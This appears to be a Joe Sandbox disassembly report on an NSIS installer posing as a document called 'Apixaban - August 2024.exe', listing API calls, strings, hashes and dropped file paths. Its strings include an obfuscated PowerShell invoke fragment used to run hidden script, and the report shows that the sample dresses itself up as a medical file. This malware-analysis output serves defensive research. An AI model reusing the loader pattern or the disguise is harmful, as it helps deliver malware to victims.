3671 4015b9 3672 402b38 18 API calls 3671->3672 3673 4015c0 3672->3673 3674 4059de 4 API calls 3673->3674 3685 4015c9 3674->3685 3675 401614 3677 401646 3675->3677 3678 401619 3675->3678 3676 405960 CharNextW 3680 4015d7 CreateDirectoryW 3676->3680 3682 401423 25 API calls 3677->3682 3689 401423 3678->3689 3683 4015ed GetLastError 3680->3683 3680->3685 3688 40163e 3682->3688 3683->3685 3686 4015fa GetFileAttributesW 3683->3686 3685->3675 3685->3676 3686->3685 3687 40162d SetCurrentDirectoryW 3687->3688 3690 405192 25 API calls 3689->3690 3691 401431 3690->3691 3692 405ee8 lstrcpynW 3691->3692 3692->3687 4426 401939 4427 402b38 18 API calls 4426->4427 4428 401940 lstrlenW 4427->4428 4429 4024e6 4428->4429 4430 402939 4431 402b1b 18 API calls 4430->4431 4432 40293f 4431->4432 4433 402972 4432->4433 4434 40294d 4432->4434 4436 402791 4432->4436 4435 405f0a 18 API calls 4433->4435 4433->4436 4434->4436 4438 405e2f wsprintfW 4434->4438 4435->4436 4438->4436 4439 40653d 4441 4063c1 4439->4441 4440 406d2c 4441->4440 4442 406442 GlobalFree 4441->4442 4443 40644b GlobalAlloc 4441->4443 4444 4064c2 GlobalAlloc 4441->4444 4445 4064b9 GlobalFree 4441->4445 4442->4443 4443->4440 4443->4441 4444->4440 4444->4441 4445->4444 4446 40173f 4447 402b38 18 API calls 4446->4447 4448 401746 4447->4448 4449 405b83 2 API calls 4448->4449 4450 40174d 4449->4450 4450->4450

Control-flow Graph

APIs
• #17.COMCTL32 ref: 00403377
• SetErrorMode.KERNELBASE(00008001), ref: 00403382
• OleInitialize.OLE32(00000000), ref: 00403389
  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
• SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
• GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000000), ref: 004033D9
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000020), ref: 00403400
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                • OleUninitialize.OLE32(?), ref: 0040361F
                                                • ExitProcess.KERNEL32 ref: 0040363F
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000000,?), ref: 00403657
                                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ",?), ref: 004036C4
                                                • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                • ExitProcess.KERNEL32 ref: 004037BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                • API String ID: 4107622049-1147740043
                                                • Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                • Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                • GetClientRect.USER32(?,?), ref: 0040537C
                                                • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                • ShowWindow.USER32(?,00000008), ref: 00405420
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                  • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
                                                • ShowWindow.USER32(00000000), ref: 004054CC
                                                • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                • ShowWindow.USER32(00000008), ref: 0040551B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                • CreatePopupMenu.USER32 ref: 00405560
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                • GetWindowRect.USER32(?,?), ref: 00405594
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                • OpenClipboard.USER32(00000000), ref: 004055F5
                                                • EmptyClipboard.USER32 ref: 004055FB
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                • CloseClipboard.USER32 ref: 00405656
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                • Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                                APIs
                                                • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
                                                • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: ';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-3278629893
                                                • Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                • Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                                • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 00405799
                                                • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405804
                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 0040580A
                                                • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 0040581A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                • FindClose.KERNEL32(00000000), ref: 004058C9
                                                Strings
                                                • \*.*, xrefs: 004057DB
                                                • "C:\Users\user\Desktop\Apixaban - August 2024.exe", xrefs: 00405779
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-872662500
                                                • Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                • Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                                • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75572EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406236
                                                • FindClose.KERNEL32(00000000), ref: 00406242
                                                Strings
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: WB
                                                • API String ID: 2295610775-2854515933
                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                                APIs
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                • RegisterClassW.USER32(00428180), ref: 00403A57
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                Strings
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 914957316-619161790
                                                • Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                • Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                                • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                • ShowWindow.USER32(?), ref: 00403CAE
                                                • DestroyWindow.USER32 ref: 00403CC2
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                • EnableWindow.USER32(?,?), ref: 00403F31
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                                • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                • Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                                • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DCE
                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
                                                • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                Strings
                                                • Error launching installer, xrefs: 00402E0A
                                                • soft, xrefs: 00402EAA
                                                • Inst, xrefs: 00402EA1
                                                • "C:\Users\user\Desktop\Apixaban - August 2024.exe", xrefs: 00402DC3
                                                • Null, xrefs: 00402EB3
                                                • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-2878596472
                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                                • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren,?,?,00000031), ref: 004017B8
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                • API String ID: 1941528284-2973341950
                                                • Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                • Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

                                                Control-flow Graph

                                                control_flow_graph 604 405192-4051a7 605 4051ad-4051be 604->605 606 40525e-405262 604->606 607 4051c0-4051c4 call 405f0a 605->607 608 4051c9-4051d5 lstrlenW 605->608 607->608 610 4051f2-4051f6 608->610 611 4051d7-4051e7 lstrlenW 608->611 613 405205-405209 610->613 614 4051f8-4051ff SetWindowTextW 610->614 611->606 612 4051e9-4051ed lstrcatW 611->612 612->610 615 40520b-40524d SendMessageW * 3 613->615 616 40524f-405251 613->616 614->613 615->616 616->606 617 405253-405256 616->617 617->606
                                                APIs
                                                • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
